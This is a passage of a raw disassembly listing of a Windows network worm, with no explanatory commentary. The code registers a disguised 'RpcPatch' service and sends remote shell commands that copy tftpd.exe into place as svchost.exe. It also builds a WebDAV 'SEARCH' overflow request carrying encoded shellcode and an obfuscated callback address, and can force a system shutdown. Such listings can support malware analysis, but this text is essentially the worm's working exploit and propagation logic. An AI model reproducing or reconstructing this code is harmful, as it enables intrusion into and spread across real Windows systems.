pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401C6C: ; CODE XREF: sub_401B90+93�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
pop ecx
retn
sub_401B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C80 proc near ; DATA XREF: sub_401990+116�o
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FF = byte ptr -3FFh
arg_0 = dword ptr 4
sub esp, 404h
mov eax, [esp+404h+arg_0]
push ebp
push esi
push edi
mov esi, [eax]
mov ecx, 0FFh
xor eax, eax
lea edi, [esp+410h+var_3FF]
mov [esp+410h+var_400], 0
push 4
rep stosd
lea ecx, [esp+414h+var_404]
mov [esp+414h+var_404], 1388h
stosw
push ecx
push 1006h
push 0FFFFh
push esi
stosb
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
test eax, eax
jz loc_401E54
mov ebp, dword_404100
lea eax, [esp+410h+var_400]
push offset aMicrosoftWindo ; "Microsoft Windows"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz loc_401E54
lea ecx, [esp+410h+var_400]
push offset dword_4061BC
push ecx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401D4D
loc_401D1D: ; CODE XREF: sub_401C80+CB�j
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
mov [esp+eax+410h+var_400], 0
lea eax, [esp+410h+var_400]
push offset dword_4061BC
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz short loc_401D1D
loc_401D4D: ; CODE XREF: sub_401C80+9B�j
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirWinsDllhost ; "dir wins\\dllhost.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aDllhost_exe ; "DLLHOST.EXE"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea eax, [esp+410h+var_400]
push offset aDllhost_exe_0 ; "dllhost.exe"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirDllcacheTft ; "dir dllcache\\tftpd.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aTftpd_exe_0 ; "tftpd.exe"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea eax, [esp+410h+var_400]
push offset aTftpd_exe ; "TFTPD.EXE"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea ecx, [esp+410h+var_400]
push ecx
push offset dword_407628
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
jmp short loc_401E07
; ---------------------------------------------------------------------------
loc_401DF0: ; CODE XREF: sub_401C80+142�j
; sub_401C80+155�j
lea edx, [esp+410h+var_400]
push edx
push offset aCopyDllcacheTf ; "copy dllcache\\tftpd.exe wins\\svchost.ex"...
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz short loc_401E54
loc_401E07: ; CODE XREF: sub_401C80+16E�j
lea eax, [esp+410h+var_400]
push eax
push offset dword_4075A8
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
mov ebp, dword_4040C8
push 1F4h
call ebp ; dword_4040C8
mov edi, offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
or ecx, 0FFFFFFFFh
xor eax, eax
push 0
repne scasb
not ecx
dec ecx
push ecx
push offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
push esi
call dword_404168 ; send
test eax, eax
jz short loc_401E54
push 3E8h
call ebp ; dword_4040C8
loc_401E54: ; CODE XREF: sub_401C80+5F�j
; sub_401C80+67�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop esi
mov eax, [esp+408h+arg_0]
pop ebp
test eax, eax
jz short loc_401E72
push eax
call sub_402FC6
add esp, 4
loc_401E72: ; CODE XREF: sub_401C80+1E7�j
mov eax, 1
add esp, 404h
retn 4
sub_401C80 endp
; =============== S U B R O U T I N E =======================================
sub_401E80 proc near ; CODE XREF: sub_401210:loc_401217�p
; sub_401210+17�p
push offset aMicrosoft_com ; "microsoft.com"
call dword_404160 ; gethostbyname
neg eax
sbb eax, eax
neg eax
retn
sub_401E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EA0 proc near ; CODE XREF: sub_401210:loc_401230�p
var_70 = dword ptr -70h
var_64 = byte ptr -64h
sub esp, 74h
lea eax, [esp+74h+var_64]
push esi
push 64h
push eax
call dword_404158 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_401F1D
lea ecx, [esp+78h+var_64]
push ecx
call dword_404160 ; gethostbyname
test eax, eax
jz short loc_401F1D
mov edx, [eax+0Ch]
mov esi, [edx]
test esi, esi
jz short loc_401F1D
movsx ecx, word ptr [eax+0Ah]
mov eax, ecx
push edi
lea edi, [esp+7Ch+var_70]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+7Ch+var_70]
push ecx
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, 1
mov edx, ecx
mov esi, edi
mov edi, offset dword_407478
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401F1D: ; CODE XREF: sub_401EA0+14�j
; sub_401EA0+23�j ...
xor eax, eax
pop esi
add esp, 74h
retn
sub_401EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F30 proc near ; CODE XREF: sub_401280+A5�p
var_50 = byte ptr -50h
sub esp, 50h
or ecx, 0FFFFFFFFh
xor eax, eax
push esi
push edi
mov edi, offset aSearch ; "SEARCH /"
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ds:dword_4075A0
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, 41414141h
and ecx, 3
rep movsb
mov edx, ds:dword_4075A0
mov ecx, 41h
mov dword_406424, 8
mov esi, offset aU5951U6858U759 ; "%u5951%u6858%u759f%u0018%u5951%u6858%u7"...
lea edi, [edx+8]
rep stosd
stosb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 105h
mov ecx, 41414141h
mov dword_406424, eax
add eax, edx
mov [eax], ecx
mov [eax+4], ecx
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 8
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 30h
rep movsd
movsb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 0C0h
mov ecx, 31h
mov esi, offset aU5390U665eU66a ; "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"...
mov dword_406424, eax
lea edi, [eax+edx]
rep movsd
movsw
movsb
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 0C6h
mov esi, offset aFfilomidomfafd ; "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"...
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 55h
rep movsd
movsb
mov edx, dword_406424
mov esi, ds:dword_4075A0
add edx, 154h
mov ecx, 3F52h
mov eax, 4E4E4E4Eh
mov dword_406424, edx
lea edi, [edx+esi]
mov esi, offset aHttp1_1Host127 ; " HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"...
rep stosd
stosw
mov eax, dword_406424
mov edx, ds:dword_4075A0
mov ecx, 14h
lea edi, [esp+58h+var_50]
add eax, 0FD4Ah
rep movsd
lea edi, [eax+edx]
mov ecx, 14h
lea esi, [esp+58h+var_50]
mov dword_406424, eax
rep movsd
mov eax, dword_406424
mov esi, offset loc_40597E
add eax, 4Fh
mov dword_406424, eax
lea ecx, [eax+0E7h]
lea edx, [eax+0ECh]
mov dword_40642C, ecx
mov ecx, ds:dword_4075A0
mov ds:dword_407470, edx
lea edi, [eax+ecx]
mov ecx, 5Dh
rep movsd
movsw
mov eax, dword_406424
mov esi, ds:dword_4075A0
mov cx, word_406238
mov dl, byte_40623A
add eax, 175h
pop edi
mov dword_406424, eax
add eax, esi
pop esi
mov [eax], cx
mov [eax+2], dl
mov eax, dword_406424
add eax, 2
mov dword_406424, eax
add esp, 50h
retn
sub_401F30 endp
; =============== S U B R O U T I N E =======================================
sub_4020E0 proc near ; CODE XREF: sub_401210+57�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, ds:dword_4075A0
mov edx, dword_40642C
xor eax, 9999h
push offset dword_407478
mov [edx+ecx], ax
call dword_404194 ; inet_addr
mov ecx, ds:dword_4075A0
mov edx, ds:dword_407470
xor eax, 99999999h
mov [edx+ecx], eax
retn
sub_4020E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402130 proc near ; CODE XREF: sub_401210+5C�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, dword_406428
xor eax, 9999h
push offset dword_407478
mov word ptr dword_406470[ecx], ax
call dword_404194 ; inet_addr
mov edx, ds:dword_407474
xor eax, 99999999h
mov dword_406470[edx], eax
retn
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402170 proc near ; CODE XREF: sub_401280+AA�p
push esi
mov eax, dword_4057DC
push edi
mov ecx, 0D8h
mov esi, offset dword_40547C
mov edi, offset dword_406470
rep movsd
mov ecx, dword_4057E4
add eax, 166h
add ecx, 166h
mov dword_4057DC, eax
mov dword_4057E4, ecx
mov dword_4067D8, ecx
mov ecx, dword_4057E8
mov dword_4067D0, eax
mov eax, dword_4057E0
mov dword_4067DC, ecx
mov ecx, 0B3h
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov edi, offset dword_4067E0
mov edx, dword_405484
mov dword_40584C, 100139Dh
mov dword_4067D4, eax
rep movsd
mov ecx, 0Fh
mov esi, offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
mov edi, offset dword_406AAC
add edx, 2C0h
rep movsd
mov ecx, 0Ch
mov esi, offset dword_405AF4
mov edi, offset dword_406AE8
mov eax, 2C0h
rep movsd
mov esi, dword_406480
mov ecx, dword_4064F4
mov edi, dword_406524
mov dword_406478, edx
mov edx, dword_4064F0
add esi, eax
add edx, eax
add ecx, eax
mov dword_406480, esi
mov esi, dword_406528
mov dword_4064F0, edx
mov edx, dword_406540
mov dword_4064F4, ecx
mov ecx, dword_4065FC
add edi, eax
add esi, eax
mov dword_406524, edi
add edx, eax
add ecx, eax
mov dword_406528, esi
pop edi
mov dword_406428, 5ADh
mov ds:dword_407474, 5B2h
mov dword_406420, 6A8h
mov dword_406540, edx
mov dword_4065FC, ecx
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401780+1E8�p
; DATA XREF: sub_40B5F2+2E�w
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 8
sub esp, 14h
lea eax, [esp+14h+var_14]
push eax
push 28h
call dword_40409C ; GetCurrentProcess
push eax
call dword_404044 ; OpenProcessToken
lea ecx, [esp+10h+var_8]
push ecx
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
push 0
call dword_404048 ; LookupPrivilegeValueA
mov eax, [esp+10h+var_10]
push 0
push 0
lea edx, [esp+18h+var_C]
push 0
push edx
push 0
push eax
mov [esp+28h+var_C], 1
mov dword ptr [esp+28h], 2
call dword_404028 ; AdjustTokenPrivileges
mov ecx, [esp+10h+arg_4]
push 0
loc_4022F7: ; DATA XREF: sub_40B583�w
; sub_40B583+29�r
or ecx, 4
push ecx
call dword_404148 ; ExitWindowsEx
add esp, 14h
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: sub_401780+8�p
var_9C = dword ptr -9Ch
var_94 = dword ptr -94h
sub esp, 9Ch
call dword_404094 ; GetVersion
and eax, 0FFh
lea ecx, [esp+9Ch+var_9C]
cmp eax, 5
push ecx
sbb eax, eax
and al, 0F8h
add eax, 9Ch
mov [esp+0A0h+var_9C], eax
call dword_404098 ; GetVersionExA
mov eax, [esp+9Ch+var_94]
add esp, 9Ch
retn
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402390+D�p
; sub_402390+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
lea eax, [esp+arg_0]
push eax
push 1
push 0
push ecx
push 80000002h
call dword_40403C ; RegOpenKeyExA
test eax, eax
jnz short loc_40237E
mov edx, [esp+arg_0]
push edx
call dword_404040 ; RegCloseKey
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40237E: ; CODE XREF: sub_402350+1B�j
xor eax, eax
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402390 proc near ; CODE XREF: sub_401780+1D�p
; sub_401780+1DA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_4023AC
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Updates\\Windows 2000"...
call sub_402350
add esp, 4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4023AC: ; CODE XREF: sub_402390+6�j
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
retn
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_402390+2B�j
; sub_402390+3C�j
mov eax, 1
retn
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; CODE XREF: sub_4015E0+61�p
; sub_401660+5C�p
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 110h
push ebx
push ebp
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
jnz short loc_40240A
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40240A: ; CODE XREF: sub_4023E0+1D�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+120h+var_107]
mov [esp+120h+var_108], 0
rep stosd
mov edi, [esp+120h+arg_8]
lea eax, [esp+120h+var_108]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsS ; "%s\\wins\\%s"
push eax
call dword_40411C ; sprintf
push offset aSvchost_exe ; "svchost.exe"
push edi
mov esi, 2
call dword_404140 ; _stricmp
add esp, 18h
test eax, eax
jnz short loc_402456
mov esi, 3
loc_402456: ; CODE XREF: sub_4023E0+6F�j
push 0
mov edx, [esp+124h+arg_4]
push 0
mov eax, [esp+128h+arg_0]
push 0
push 0
lea ecx, [esp+130h+var_108]
push 0
push ecx
push 0
push esi
push 110h
push 0F01FFh
push edx
push eax
push ebp
call dword_404030 ; CreateServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_4024A3
push ebp
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_4023E0+AD�j
mov ecx, [esp+120h+arg_C]
push 0F01FFh
push ecx
push ebp
mov [esp+12Ch+var_110], offset aManagesNetwork ; "Manages network configuration by updati"...
xor esi, esi
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jz short loc_402507
push 400h
push 40h
mov [esp+128h+var_10C], esi
call dword_40408C ; LocalAlloc
mov esi, eax
test esi, esi
jz short loc_4024FC
lea edx, [esp+120h+var_10C]
push edx
push 400h
push esi
push 1
push edi
call dword_404004 ; QueryServiceConfig2A
test eax, eax
jz short loc_4024FC
mov eax, [esi]
mov [esp+120h+var_110], eax
loc_4024FC: ; CODE XREF: sub_4023E0+FC�j
; sub_4023E0+114�j
push edi
mov edi, dword_404034
call edi ; dword_404034
jmp short loc_40250D
; ---------------------------------------------------------------------------
loc_402507: ; CODE XREF: sub_4023E0+E5�j
mov edi, dword_404034
loc_40250D: ; CODE XREF: sub_4023E0+125�j
lea ecx, [esp+120h+var_110]
push ecx
push 1
push ebx
call dword_404000 ; ChangeServiceConfig2A
test esi, esi
jz short loc_402526
push esi
call dword_404090 ; LocalFree
loc_402526: ; CODE XREF: sub_4023E0+13D�j
push ebx
call edi ; dword_404034
push ebp
call edi ; dword_404034
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 110h
retn
sub_4023E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402540 proc near ; CODE XREF: sub_401280+EC�p
; sub_401280+110�p
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
sub esp, 134h
push ebp
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
mov [esp+13Ch+var_134], ebp
jnz short loc_40256A
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_40256A: ; CODE XREF: sub_402540+1F�j
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+140h+var_104]
push offset aDSWins ; "-d%s\\wins"
push eax
mov [esp+148h+var_130], 0
call dword_40411C ; sprintf
mov edx, [esp+148h+arg_0]
add esp, 0Ch
lea ecx, [esp+13Ch+var_104]
push 0F01FFh
push edx
push ebp
mov [esp+148h+var_128], ecx
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jnz short loc_4025B5
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_402540+6A�j
push ebx
push esi
push 400h
push 40h
call dword_40408C ; LocalAlloc
mov esi, dword_40401C
mov ebx, eax
lea eax, [esp+13Ch+var_118]
mov [esp+13Ch+var_124], ebx
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_4025E3
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_4025E3: ; CODE XREF: sub_402540+9A�j
mov eax, [esp+13Ch+var_114]
cmp eax, 4
jz loc_402709
cmp eax, 2
jz loc_402709
lea ecx, [esp+13Ch+var_11C]
push ecx
push 400h
push ebx
push edi
call dword_404020 ; QueryServiceConfigA
test eax, eax
jnz short loc_402616
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402616: ; CODE XREF: sub_402540+CD�j
cmp dword ptr [ebx+4], 4
jnz short loc_402642
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 3
push 0FFFFFFFFh
push edi
call dword_404024 ; ChangeServiceConfigA
test eax, eax
jnz short loc_402642
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402642: ; CODE XREF: sub_402540+DA�j
; sub_402540+F9�j
lea edx, [esp+13Ch+var_120]
push edx
push 1
push edi
call dword_404008 ; StartServiceA
test eax, eax
jnz short loc_40265B
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40265B: ; CODE XREF: sub_402540+112�j
lea eax, [esp+13Ch+var_118]
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_40266E
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40266E: ; CODE XREF: sub_402540+125�j
cmp [esp+13Ch+var_114], 2
jnz loc_4026F9
mov ebp, dword_4040C8
mov ebx, dword_4040C0
mov esi, [esp+13Ch+var_11C]
loc_402689: ; CODE XREF: sub_402540+1AF�j
mov eax, 0CCCCCCCDh
mul [esp+13Ch+var_100]
shr edx, 3
cmp edx, 3E8h
jnb short loc_4026A4
mov edx, 3E8h
jmp short loc_4026B1
; ---------------------------------------------------------------------------
loc_4026A4: ; CODE XREF: sub_402540+15B�j
cmp edx, 2710h
jbe short loc_4026B1
mov edx, 2710h
loc_4026B1: ; CODE XREF: sub_402540+162�j
; sub_402540+16A�j
push edx
call ebp ; dword_4040C8
lea ecx, [esp+13Ch+var_118]
push ecx
push edi
call dword_40401C ; QueryServiceStatus
test eax, eax
jz short loc_4026F1
mov edx, [esp+13Ch+var_128]
mov eax, [esp+13Ch+var_104]
cmp eax, edx
jbe short loc_4026DE
call ebx ; dword_4040C0
mov esi, eax
mov eax, [esp+13Ch+var_104]
mov [esp+13Ch+var_128], eax
jmp short loc_4026EA
; ---------------------------------------------------------------------------
loc_4026DE: ; CODE XREF: sub_402540+18E�j
call ebx ; dword_4040C0
mov ecx, [esp+13Ch+var_100]
sub eax, esi
cmp eax, ecx
ja short loc_4026F1
loc_4026EA: ; CODE XREF: sub_402540+19C�j
cmp [esp+13Ch+var_114], 2
jz short loc_402689
loc_4026F1: ; CODE XREF: sub_402540+182�j
; sub_402540+1A8�j
mov ebp, [esp+13Ch+var_12C]
mov ebx, [esp+13Ch+var_124]
loc_4026F9: ; CODE XREF: sub_402540+133�j
mov eax, [esp+13Ch+var_114]
xor ecx, ecx
cmp eax, 4
setz cl
mov esi, ecx
jmp short loc_40270E
; ---------------------------------------------------------------------------
loc_402709: ; CODE XREF: sub_402540+AA�j
; sub_402540+B3�j
mov esi, 1
loc_40270E: ; CODE XREF: sub_402540+9E�j
; sub_402540+D1�j ...
push ebx
call dword_404090 ; LocalFree
push edi
mov edi, dword_404034
call edi ; dword_404034
push ebp
call edi ; dword_404034
mov eax, esi
pop esi
pop ebx
pop edi
pop ebp
add esp, 134h
retn
sub_402540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_4011C0+1F�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
sub esp, 1Ch
push esi
push edi
push 80000000h
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jnz short loc_402755
pop edi
mov eax, 11111111h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402755: ; CODE XREF: sub_402730+18�j
push 0F01FFh
push offset aRpcpatch ; "RpcPatch"
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402777
pop edi
mov eax, 22222222h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402777: ; CODE XREF: sub_402730+3A�j
lea eax, [esp+24h+var_1C]
push eax
push esi
call dword_40401C ; QueryServiceStatus
test eax, eax
push esi
mov esi, dword_404034
jnz short loc_40279E
call esi ; dword_404034
push edi
call esi ; dword_404034
pop edi
mov eax, 33333333h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_40279E: ; CODE XREF: sub_402730+5C�j
call esi ; dword_404034
push edi
call esi ; dword_404034
mov eax, [esp+24h+var_18]
pop edi
pop esi
add esp, 1Ch
retn
sub_402730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_4011C0+6�p
push offset aRpcpatch_mutex ; "RpcPatch_Mutex"
push 0
push 0
call dword_404084 ; CreateMutexA
test eax, eax
jz short loc_4027D3
call dword_404060 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_4027D3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4027D3: ; CODE XREF: sub_4027B0+11�j
; sub_4027B0+1E�j
mov eax, 1
retn
sub_4027B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027E0 proc near ; CODE XREF: sub_4011C0:loc_4011FC�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
xor eax, eax
mov [esp+10h+var_10], offset aRpcpatch ; "RpcPatch"
mov [esp+10h+var_8], eax
mov [esp+10h+var_4], eax
lea eax, [esp+10h+var_10]
mov [esp+10h+var_C], offset loc_402920
push eax
call dword_404018 ; StartServiceCtrlDispatcherA
neg eax
sbb eax, eax
neg eax
dec eax
add esp, 10h
retn
sub_4027E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_402880+1A�p
; sub_402880+33�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 1Ch
mov eax, [esp+1Ch+arg_0]
mov ecx, [esp+1Ch+arg_8]
mov dword_405BA0, eax
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+arg_4]
lea edx, [esp+1Ch+var_1C]
mov [esp+1Ch+var_10], eax
mov eax, ds:dword_4076A8
push edx
push eax
mov [esp+24h+var_1C], 10h
mov [esp+24h+var_14], 5
mov [esp+24h+var_C], 0
mov [esp+24h+var_8], ecx
mov [esp+24h+var_4], 0BB8h
call dword_404014 ; SetServiceStatus
add esp, 1Ch
retn
sub_402820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402880 proc near ; DATA XREF: seg000:loc_402920�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
cmp eax, 3 ; switch 4 cases
ja short locret_402909 ; default
jmp off_40290C[eax*4] ; switch jump
loc_402891: ; DATA XREF: seg000:off_40290C�o
push 1388h ; jumptable 0040288A case 0
push 0
push 3
call sub_402820
add esp, 0Ch
push 3E8h
call dword_4040C8 ; Sleep
push 0
push 0
push 1
call sub_402820
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_4028BE: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 1
push 0
push 6
call sub_402820
push 0
push 0
push 7
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 2
push 0
push 5
call sub_402820
push 0
push 0
push 4
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028F6: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
mov ecx, dword_405BA0 ; jumptable 0040288A case 3
push 0
push 0
push ecx
call sub_402820
add esp, 0Ch
locret_402909: ; CODE XREF: sub_402880+8�j
retn 4 ; default
sub_402880 endp
; ---------------------------------------------------------------------------
off_40290C dd offset loc_402891 ; DATA XREF: sub_402880+A�r
dd offset loc_4028BE ; jump table for switch statement
dd offset loc_4028DA
dd offset loc_4028F6
align 10h
loc_402920: ; DATA XREF: sub_4027E0+19�o
push offset sub_402880
push offset aRpcpatch ; "RpcPatch"
call dword_404010 ; RegisterServiceCtrlHandlerA
test eax, eax
mov ds:dword_4076A8, eax
jz short locret_40296D
push 1
push 0
push 2
call sub_402820
push 0
push 0
push 4
call sub_402820
call sub_401280
push 0
push 0
push 3
call sub_402820
push 0
push 0
push 1
call sub_402820
add esp, 30h
locret_40296D: ; CODE XREF: seg000:00402937�j
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402970 proc near ; CODE XREF: sub_401280+4E�p
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, dword_4040A8
lea eax, [ebp+var_10C]
push 104h
push eax
push 0
call esi ; dword_4040A8
lea ecx, [ebp+var_10C]
push ecx
call dword_404074 ; GetFileAttributesA
test al, 1
jz short loc_4029B1
and al, 0FEh
lea edx, [ebp+var_10C]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_4029B1: ; CODE XREF: sub_402970+2F�j
push 0
call dword_40407C ; GetModuleHandleA
lea ecx, [ebp+var_210]
push 104h
push ecx
push eax
mov [ebp+var_4], eax
call esi ; dword_4040A8
push 4
call dword_4040E0 ; CloseHandle
lea eax, [ebp+var_210]
push 0
push 0
push eax
push dword_4040BC
push [ebp+var_4]
push dword_4040E8
push dword_404080
retn
sub_402970 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A00 proc near ; CODE XREF: sub_401280+1E�p
; sub_401280+1D9�p
var_108 = byte ptr -108h
var_104 = byte ptr -104h
